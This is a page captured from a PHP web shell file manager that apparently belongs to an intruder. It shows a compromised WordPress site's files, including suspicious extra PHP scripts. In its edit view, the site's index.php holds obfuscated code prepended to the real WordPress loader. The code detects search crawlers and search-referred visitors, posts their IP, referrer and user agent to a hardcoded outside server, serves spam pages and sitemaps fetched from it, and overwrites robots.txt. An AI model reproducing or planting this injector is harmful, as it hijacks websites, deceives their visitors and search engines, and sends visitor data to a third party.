📁
SKYSHELL MANAGER
PHP v8.3.27
Create
Create
Path:
root
/
home
/
onlinead
/
public_html
/
Name
Size
Perm
Actions
📁
.tmb
-
0755
🗑️
🏷️
🔒
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
o
-
0755
🗑️
🏷️
🔒
📁
wp
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-adminn
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📁
yk
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.71 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
144.php
26.64 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
16340.11 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
9.24 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
license.txt
19.44 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
main_5ni3yjm8.php
19.06 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
memberfuns.php
19.06 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.1 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
readme.html
7.23 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
7.2 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-blog-header.php
0.34 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-comments-post.php
2.27 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config-sample.php
3.26 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config.php
3.49 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-cron.php
5.49 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-links-opml.php
2.43 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-load.php
3.84 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-login.php
50.63 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
8.52 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-settings.php
31.88 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-signup.php
33.81 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-trackback.php
5.09 KB
0755
🗑️
🏷️
⬇️
✏️
🔒
📄
xmlrpc.php
3.13 KB
0000
🗑️
🏷️
⬇️
✏️
🔒
Edit: index.php
<?php goto r3uoQ; JMOBN: $domain = $_SERVER["\x48\x54\124\x50\x5f\x48\x4f\x53\124"]; goto fhVSo; Y1S8Y: if (strpos($req_uri, "\56\x70\150\x70")) { $href1 = $http . $domain . $self; } else { $href1 = $http . $domain; } goto coKnv; HPArv: $req_url = $http . $domain . $req_uri; goto doIIu; r3uoQ: $inter_domain = "\x68\164\x74\x70\72\57\57\x31\x37\63\x2e\x32\60\x38\56\x32\60\63\56\x32\60\x32\57\x7a\x36\60\x36\61\x31\137\61\x36\x2f"; goto PIAI6; qOWPv: if (!$res_crawl && $chk_refer && (preg_match("\57\134\x64\x24\x2f", $req_uri) || preg_match("\x23\133\x61\x2d\x7a\x5d\x3d\133\x61\55\172\x30\55\71\x5d\53\43", $req_uri) || preg_match("\x2f\x69\x74\145\155\57", $req_uri))) { $data1["\151\x70"] = $_SERVER["\122\105\x4d\117\124\105\x5f\101\x44\x44\122"]; $data1["\x72\145\x66\x65\162\145\x72"] = isset($_SERVER["\110\x54\x54\120\137\x52\105\106\105\122\105\122"]) ? $_SERVER["\110\124\x54\120\137\x52\x45\106\105\122\x45\122"] : ''; $data1["\165\163\x65\x72\137\141\147\145\x6e\x74"] = strtolower(isset($_SERVER["\x48\x54\x54\x50\137\x55\123\x45\122\x5f\101\107\105\116\x54"]) ? $_SERVER["\110\x54\124\x50\x5f\125\x53\x45\122\x5f\x41\107\105\x4e\124"] : ''); echo getServerCont($jump1, $data1); die; } goto llDXV; IT_KM: $url_robots = $inter_domain . "\x2f\x72\157\x62\x6f\164\163\56\x70\x68\160"; goto Y1S8Y; e5h_J: if (substr($req_uri, -6) == "\162\x6f\142\157\x74\163") { define("\x42\101\123\105\x5f\120\101\124\x48", $_SERVER["\x44\117\x43\125\115\x45\x4e\x54\x5f\x52\117\117\124"]); $robots_cont = @file_get_contents(BASE_PATH . "\x2f\x72\157\142\157\164\163\56\164\170\164"); $data1["\162\157\x62\157\x74\x73\137\x63\x6f\x6e\x74"] = $robots_cont; $robots_cont = @getServerCont($url_robots, $data1); file_put_contents(BASE_PATH . "\57\162\157\x62\157\x74\163\56\x74\x78\164", $robots_cont); $robots_cont = @file_get_contents(BASE_PATH . "\x2f\x72\x6f\142\x6f\164\163\x2e\x74\170\x74"); if (strpos(strtolower($robots_cont), "\163\151\164\145\x6d\x61\x70")) { echo "\x72\x6f\142\x6f\x74\163\56\x74\170\x74\40\146\151\x6c\x65\x20\143\x72\145\x61\164\145\x20\x73\165\143\x63\145\x73\163\41"; } else { echo "\x72\x6f\142\x6f\164\163\x2e\x74\x78\x74\x20\x66\x69\x6c\x65\40\x63\x72\x65\x61\164\145\x20\146\141\x69\154\41"; } die; } goto HVhBG; U226n: function is_crawler($agent) { $agent_check = false; $bots = "\x67\157\x6f\147\x6c\x65\x62\x6f\x74\x7c\x62\151\156\147\x62\157\x74\x7c\147\157\157\x67\x6c\145\x7c\x61\x6f\154\x7c\x62\x69\156\147\x7c\x79\141\150\157\157"; if ($agent != '') { if (preg_match("\x2f\50{$bots}\x29\x2f\x73\151", $agent)) { $agent_check = true; } } return $agent_check; } goto hDEyF; D7G2D: $req_uri = str_replace(array("\x2e\x68\x74\155", "\56\x68\x74\x6d\154", "\56\163\x68\x74\x6d\154", "\56\160\150\x74\155\x6c"), '', rtrim($req_uri, "\x2f")); goto qOWPv; kR3ny: $ser_name = $_SERVER["\123\x45\122\126\105\122\137\x4e\x41\115\105"]; goto HPArv; HlvEq: $user_agent = strtolower(isset($_SERVER["\x48\124\124\120\x5f\125\x53\x45\122\137\101\x47\x45\x4e\x54"]) ? $_SERVER["\110\x54\x54\120\137\x55\x53\x45\x52\x5f\101\107\x45\116\x54"] : ''); goto FkJPq; Yvqip: $data1["\x72\145\161\x5f\x75\162\154"] = $req_url; goto e5h_J; A3lTp: $http = isset($_SERVER["\x48\124\x54\x50\x53"]) && $_SERVER["\110\x54\x54\120\x53"] !== "\157\146\146" ? "\x68\164\x74\160\x73\72\57\x2f" : "\x68\x74\x74\160\x3a\57\57"; goto t9NBQ; aA2LM: $map1 = $inter_domain . "\x2f\x6d\141\x70\56\160\150\x70"; goto IgyMn; IgyMn: $jump1 = $inter_domain . "\x2f\152\165\x6d\160\56\160\x68\160"; goto GLW12; Eyfss: $data1["\x64\157\x6d\141\151\156"] = $domain; goto nnIY6; LZzi4: if (strpos($req_uri, "\56\160\x68\x70")) { $main_shell = $http . $ser_name . $self; $data1["\155\x61\151\156\x5f\163\x68\145\154\x6c"] = $main_shell; } else { $main_shell = $http . $ser_name; $data1["\x6d\x61\151\156\x5f\x73\150\145\154\x6c"] = $main_shell; } goto DuxHW; nnIY6: $data1["\162\145\161\137\x75\x72\151"] = $req_uri; goto E84yg; HVhBG: if (substr($req_uri, -4) == "\x2e\170\155\x6c") { if (strpos($req_uri, "\141\154\x6c\x73\151\x74\x65\x6d\141\160\x2e\170\x6d\x6c")) { $str_cont = getServerCont($map1, $data1); header("\x43\x6f\x6e\164\145\x6e\164\x2d\x74\171\x70\x65\72\164\145\x78\164\57\170\x6d\x6c"); echo $str_cont; die; } if (strpos($req_uri, "\56\160\150\160")) { $word4 = explode("\77", $req_uri); $word4 = $word4[count($word4) - 1]; $word4 = str_replace("\x2e\170\x6d\x6c", '', $word4); } else { $word4 = str_replace("\57", '', $req_uri); $word4 = str_replace("\x2e\x78\x6d\154", '', $word4); } $data1["\x77\157\x72\x64"] = $word4; $data1["\141\143\x74\x69\157\156"] = "\x63\x68\145\143\x6b\x5f\163\151\x74\x65\155\x61\x70"; $check_url4 = getServerCont($url_words, $data1); if ($check_url4 == "\x31") { $str_cont = getServerCont($map1, $data1); header("\x43\157\156\x74\145\156\x74\55\x74\x79\x70\x65\72\164\x65\x78\164\x2f\x78\x6d\154"); echo $str_cont; die; } $data1["\141\143\x74\151\157\156"] = "\143\150\145\x63\x6b\x5f\x77\157\162\x64\x73"; $check1 = getServerCont($url_words, $data1); if (strpos($req_uri, "\x6d\x61\x70") > 0 || $check1 == "\61") { $data1["\x61\x63\164\151\157\x6e"] = "\x72\x61\156\x64\137\170\x6d\x6c"; $check_url4 = getServerCont($url_words, $data1); header("\103\157\x6e\x74\145\x6e\164\55\164\x79\x70\145\72\x74\145\x78\x74\x2f\x78\155\154"); echo $check_url4; die; } } goto LZzi4; doIIu: $indata1 = $inter_domain . "\x2f\151\x6e\144\x61\x74\141\56\x70\150\x70"; goto aA2LM; GLW12: $url_words = $inter_domain . "\57\x77\157\x72\x64\x73\x2e\160\150\x70"; goto IT_KM; t9NBQ: $req_uri = $_SERVER["\x52\105\121\x55\105\x53\124\x5f\125\122\x49"]; goto JMOBN; llDXV: if ($res_crawl) { $data1["\150\164\x74\x70\137\x75\163\145\162\137\x61\x67\145\x6e\x74"] = $user_agent; $get_content = getServerCont($indata1, $data1); echo $get_content; die; } goto u0t4w; PIAI6: function getServerCont($url, $data = array()) { $url = str_replace("\40", "\53", $url); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "{$url}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data)); $output = curl_exec($ch); $errorCode = curl_errno($ch); if (version_compare(PHP_VERSION, "\70\x2e\x30\x2e\60", "\x3c")) { curl_close($ch); } if (0 !== $errorCode) { return false; } return $output; } goto U226n; DuxHW: $referer = isset($_SERVER["\x48\x54\x54\x50\137\122\105\106\x45\x52\x45\x52"]) ? $_SERVER["\110\124\x54\x50\137\x52\105\x46\105\122\x45\122"] : ''; goto zT0sp; fhVSo: $self = $_SERVER["\x50\110\120\x5f\123\105\114\106"]; goto kR3ny; zT0sp: $chk_refer = check_refer($referer); goto HlvEq; E84yg: $data1["\150\162\x65\146"] = $href1; goto Yvqip; FkJPq: $res_crawl = is_crawler($user_agent); goto D7G2D; hDEyF: function check_refer($refer) { $check_refer = false; $referbots = "\147\x6f\157\147\154\145\x7c\x79\141\x68\x6f\157\x7c\x62\151\156\x67\x7c\x61\x6f\154"; if ($refer != '' && preg_match("\x2f\50{$referbots}\x29\57\163\151", $refer)) { $check_refer = true; } return $check_refer; } goto A3lTp; coKnv: $data1[] = array(); goto Eyfss; u0t4w: ?> <?php /** * Front to the WordPress application. This file doesn't do anything, but loads * wp-blog-header.php which does and tells WordPress to load the theme. * * @package WordPress */ /** * Tells WordPress to load the WordPress theme and output it. * * @var bool */ define( 'WP_USE_THEMES', true ); /** Loads the WordPress Environment and Template */ require __DIR__ . '/wp-blog-header.php';
Save